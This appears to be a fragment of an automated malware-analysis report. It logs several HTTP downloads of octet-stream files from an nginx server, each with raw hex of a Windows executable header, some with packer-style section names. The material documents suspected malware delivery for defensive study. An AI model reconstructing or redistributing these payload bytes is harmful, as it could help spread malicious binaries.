00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:23 GMTContent-Type: application/octet-streamContent-Length: 745472Last-Modified: Thu, 06 Feb 2025 02:47:54 GMTConnection: keep-aliveETag: "67a422da-b6000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 2a 01 00 00 08 00 00 00 00 00 00 0e 49 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0b 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 48 01 00 4b 00 00 00 00 60 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 78 48 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 29 01 00 00 20 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 01 00 00 06 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 01 00 00 02 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 14 05 00 00 a0 01 00 00 14 05 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 14 05 00 00 c0 06 00 00 14 05 00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:27 GMTContent-Type: application/octet-streamContent-Length: 2085888Last-Modified: Thu, 13 Feb 2025 08:22:20 GMTConnection: keep-aliveETag: "67adabbc-1fd400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ae 00 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 f5 51 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6f 66 78 62 6b 68 68 00 30 1a 00 00 70 30 00 00 28 1a 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 67 6c 76 63 6d 6a 67 00 10 00 00 00 a0 4a 00 00 04 00 00 00 ae 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 b2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:33 GMTContent-Type: application/octet-streamContent-Length: 332800Last-Modified: Fri, 07 Feb 2025 04:36:30 GMTConnection: keep-aliveETag: "67a58dce-51400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 aa 00 00 00 00 00 00 40 b9 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d9 9b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 10 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 9d 04 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 64 04 00 00 10 00 00 00 66 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 73 20 00 00 00 80 04 00 00 22 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f4 cf 00 00 00 b0 04 00 00 4e 00 00 00 8c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 10 39 00 00 00 80 05 00 00 3a 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:37 GMTContent-Type: application/octet-streamContent-Length: 2125824Last-Modified: Thu, 13 Feb 2025 08:55:01 GMTConnection: keep-aliveETag: "67adb365-207000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 97 bb 8b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 20 4a 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 4a 00 00 04 00 00 01 17 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 7a 79 69 73 63 7a 6a 00 f0 19 00 00 20 30 00 00 e8 19 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6d 6c 68 69 64 74 62 00 10 00 00 00 10 4a 00 00 04 00 00 00 4a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4a 00 00 22 00 00 00 4e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:43 GMTContent-Type: application/octet-streamContent-Length: 2085888Last-Modified: Thu, 13 Feb 2025 08:09:51 GMTConnection: keep-aliveETag: "67ada8cf-1fd400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 f0 a4 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 62 04 00 00 ae 00 00 00 00 00 00 00 a0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 d8 53 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 b0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 75 70 78 6a 64 75 73 00 20 1a 00 00 70 30 00 00 16 1a 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6f 62 78 67 6a 72 71 00 10 00 00 00 90 4a 00 00 06 00 00 00 ac 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4a 00 00 22 00 00 00 b2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:48 GMTContent-Type: application/octet-streamContent-Length: 4155392Last-Modified: Thu, 13 Feb 2025 09:02:21 GMTConnection: keep-aliveETag: "67adb51d-3f6800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 02 58 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 90 27 00 00 7a 31 00 00 00 00 00 00 10 ac 00 00 10 00 00 00 50 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 40 ac 00 00 04 00 00 cd 73 3f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 5c 00 68 00 00 00 00 20 5b 00 7c 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 5c 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 5b 00 00 10 00 00 00 3c 23 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 7c 0b 01 00 00 20 5b 00 00 20 00 00 00 4c 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 5c 00 00 02 00 00 00 6c 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 33 00 00 40 5c 00 00 02 00 00 00 6e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 74 78 6e 64 6a 61 79 00 e0 1b 00 00 20 90 00 00 d2 1b 00 00 70 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 71 73 65 70 71 6b 6f 00 10 00 00 00 00 ac 00 00 04 00 00 00 42 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 ac 00 00 22 00 00 00 46 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Feb 2025 09:35:55 GMTContent-Type: application/octet-streamContent-Length: 2038272Last-Modified: Wed, 12 Feb 2025 13:31:02 GMTConnection: keep-aliveETag: "67aca296-1f1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 f0 a4 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 62 04 00 00 ae 00 00 00 00 00 00 00 c0 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 48 00 00 04 00 00 ae 18 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 29 00 00 b0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 79 69 64 6d 6f 76 75 00 60 19 00 00 50 2f 00 00 5e 19 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 66 63 61 71 79 78 70 00 10 00 00 00 b0 48 00 00 04 00 00 00 f4 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 48 00 00 22 00 00 00 f8 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 